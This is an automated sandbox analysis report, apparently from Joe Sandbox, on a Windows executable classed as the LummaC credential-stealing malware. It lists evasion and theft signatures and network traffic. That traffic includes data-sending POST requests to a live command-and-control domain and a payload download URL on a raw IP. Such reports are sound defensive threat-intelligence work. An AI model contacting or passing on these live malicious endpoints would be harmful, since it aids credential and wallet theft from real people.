Edit tour

Windows Analysis Report
Qyk8RJnGN7.exe

Overview

General Information

Sample name:Qyk8RJnGN7.exe
renamed because original name is a hash value
Original sample name:880af66f46621859f8330e966419e8cf.exe
Analysis ID:1647734
MD5:880af66f46621859f8330e966419e8cf
SHA1:ce5975e4ecf122b6463f0468e27511fa0ec3f497
SHA256:fe9333e5bbe2789f4ac7c4f7d084baf1e4d38d53c3f11ca56116cc6f6dfc9382
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • Qyk8RJnGN7.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\Qyk8RJnGN7.exe" MD5: 880AF66F46621859F8330E966419E8CF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-25T08:16:41.089875+010020283713Unknown Traffic192.168.2.749681104.21.112.1443TCP
    2025-03-25T08:16:42.812374+010020283713Unknown Traffic192.168.2.749682104.21.112.1443TCP
    2025-03-25T08:16:43.964393+010020283713Unknown Traffic192.168.2.749683104.21.112.1443TCP
    2025-03-25T08:16:45.016095+010020283713Unknown Traffic192.168.2.749684104.21.112.1443TCP
    2025-03-25T08:16:47.123472+010020283713Unknown Traffic192.168.2.749685104.21.112.1443TCP
    2025-03-25T08:16:48.152559+010020283713Unknown Traffic192.168.2.749686104.21.112.1443TCP
    2025-03-25T08:16:49.680318+010020283713Unknown Traffic192.168.2.749687104.21.112.1443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Qyk8RJnGN7.exeAvira: detected
    Source: https://wxayfarer.live/ALosnzGAvira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnzBAvira URL Cloud: Label: malware
    Source: https://wxayfarer.live/FAvira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnztAwAvira URL Cloud: Label: malware
    Source: https://wxayfarer.live:443/ALosnzAvira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnz%Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live:443/ALosnzalAvira URL Cloud: Label: malware
    Source: Qyk8RJnGN7.exeVirustotal: Detection: 69%Perma Link
    Source: Qyk8RJnGN7.exeReversingLabs: Detection: 69%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: Qyk8RJnGN7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49681 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49682 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49683 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49684 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49685 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49686 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49687 version: TLS 1.2
    Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
    Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
    Source: Joe Sandbox ViewIP Address: 176.113.115.7 176.113.115.7
    Source: Joe Sandbox ViewIP Address: 176.113.115.7 176.113.115.7
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49684 -> 104.21.112.1:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49682 -> 104.21.112.1:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49683 -> 104.21.112.1:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49686 -> 104.21.112.1:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49685 -> 104.21.112.1:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49687 -> 104.21.112.1:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49681 -> 104.21.112.1:443
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 51Host: wxayfarer.live
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WdE9K61h266dYShrUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14498Host: wxayfarer.live
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7nIl8IbbSMdUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15035Host: wxayfarer.live
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=jOQnh3r5bI1x49WdCM4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20400Host: wxayfarer.live
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C3zlAj9MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2509Host: wxayfarer.live
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=t2hEn3p4K2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 552064Host: wxayfarer.live
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 89Host: wxayfarer.live
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: wxayfarer.live
    Source: unknownHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 51Host: wxayfarer.live
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/7
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/edX
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe:9x
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exeJ
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229503900.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7:80/mine/random.exerosoft
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
    Source: Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
    Source: Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
    Source: Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
    Source: Qyk8RJnGN7.exe, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980354207.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.924127439.0000000001483000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980607301.00000000014F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/
    Source: Qyk8RJnGN7.exe, 00000000.00000003.973023880.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980607301.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.950076668.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.962059232.0000000001516000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.951776882.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.951070309.0000000005DBC000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.924032519.000000000149B000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.960833842.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.952660376.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.960980527.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/ALosnz
    Source: Qyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/ALosnz%
    Source: Qyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/ALosnzB
    Source: Qyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/ALosnzG
    Source: Qyk8RJnGN7.exe, 00000000.00000003.980607301.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/ALosnztAw
    Source: Qyk8RJnGN7.exe, 00000000.00000003.962059232.00000000014F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/F
    Source: Qyk8RJnGN7.exe, Qyk8RJnGN7.exe, 00000000.00000003.924127439.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live:443/ALosnz
    Source: Qyk8RJnGN7.exe, 00000000.00000003.980354207.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live:443/ALosnzal
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
    Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49681 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49682 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49683 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49684 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49685 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49686 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49687 version: TLS 1.2

    System Summary

    barindex
    Source: Qyk8RJnGN7.exeStatic PE information: section name:
    Source: Qyk8RJnGN7.exeStatic PE information: section name: .idata
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_015163D80_3_015163D8
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_015163D80_3_015163D8
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_015163D80_3_015163D8
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_015163D80_3_015163D8
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_015163D80_3_015163D8
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_015163D80_3_015163D8
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_015163D80_3_015163D8
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_015163D80_3_015163D8
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_015163D80_3_015163D8
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_014EE9680_3_014EE968
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_014EE9680_3_014EE968
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_014EE9680_3_014EE968
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeCode function: 0_3_014EE9680_3_014EE968
    Source: Qyk8RJnGN7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Qyk8RJnGN7.exeStatic PE information: Section: ZLIB complexity 0.998052240728022
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/2
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Qyk8RJnGN7.exe, 00000000.00000003.929627028.0000000001527000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.940159001.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.929278362.0000000005DF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: Qyk8RJnGN7.exeVirustotal: Detection: 69%
    Source: Qyk8RJnGN7.exeReversingLabs: Detection: 69%
    Source: Qyk8RJnGN7.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: Qyk8RJnGN7.exeString found in binary or memory: YRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeP
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile read: C:\Users\user\Desktop\Qyk8RJnGN7.exeJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
